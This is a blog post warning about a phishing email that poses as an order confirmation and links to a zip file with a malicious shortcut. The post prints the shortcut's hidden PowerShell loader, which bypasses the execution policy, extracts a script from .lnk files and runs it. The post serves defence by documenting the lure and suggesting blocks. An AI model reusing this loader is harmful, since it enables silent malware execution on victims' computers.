Spam Warning: Your Name, Pack(50RM_84248) confirmed: 7 items sent

by sircles on Aug 09, 2018 in Internet Security, Online Fraud, SPAM
Spam Warning: Your Name, Pack(50RM_84248) confirmed: 7 items sent    

Spam Warning: Your Name, Pack(50RM_84248) confirmed: 7 items sent

 

This email has been assembled by sourcing information from your personal history online, in this example they have sourced an old telephone number from somewhere, probably sold to them by our local council.

 

From:                                                       Direct <[email protected]>

Sent:                                                         Thursday, August 9, 2018 6:35 AM

To:                                                            Receipent

Subject:                                                   Your Name, Pack(50RM_84248) confirmed: 7 items sent

 

 

Order Acknowledgment

Dear Your name,

Your order is now confirmed. Thanks for shopping with us!

 

Billing Address:
Your Name 
Your Telephone Number Postcode 




Your Order Reference: 50RM_84248
Order Date: 8/9/2018

Delivery Address:
Your Name
Your Telephone Number Postcode

Your Order 50RM_84248 available here

Your right to cancel:

In addition to the EU and UK Distance Selling Regulations, we offer you 30 days to change your mind on any purchase.

To cancel the order, please complete the enclosed returns slip and return the item(s) to us at the address that is on the returns slip.

We recommend that you use a recorded delivery service.

Please note that you are responsible for the costs of returning the items to us unless the goods delivered are incorrect or faulty. In this case, you will be credited for the cost of your return up to a reasonable amount.

As soon as we receive your item(s) the returns procedure will be initiated and refunds will be processed.
 
 
The hyperlink 'Your Order 50RM_84248 available here' actually links to: https://kocobanana.com/.orderdetails/50RM_84248-confirmation which is presumably a genuine website as it has a certificate but it simply forwards you to: https://support.office.com/office-training-center?wt.mc_id=AID573689_QSG_184686 which is presumably not an association that Microsoft enjoy. 
The actual link downloads a zip file:
 
The contents of the zip file are as follows:
 
 
And when extracted, reveal:
 
 
The image just being a Google Pay image:
 
 
And the shortcut linking to:
 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass -wind hidden -c cd %USERPROFILE%\Documents; findstr /s fildunare ..\*.lnk > desktop.ps1;.\desktop.ps1;exit
 
As we can see, this is another Windows Powershell command but one which which we cannot make head or tail of - fildunare is not a term which any of us recognise, so any light anyone can shed would be most welcome.
Either way, it is attempting to find the string fildunare  with a .lnk extension in your documents and invokes desktop.ps1 which doesn't actually seem to be included with any version of Windows and so is a bit of a mystery.
 
Either way, make sure that .ps1 files are blocked inside of attachments, especially archive files, and this will not be an issue.
The originating email domain - glampiny.com - does not seem to be a website either so block that domain from your email server.
,

Add comment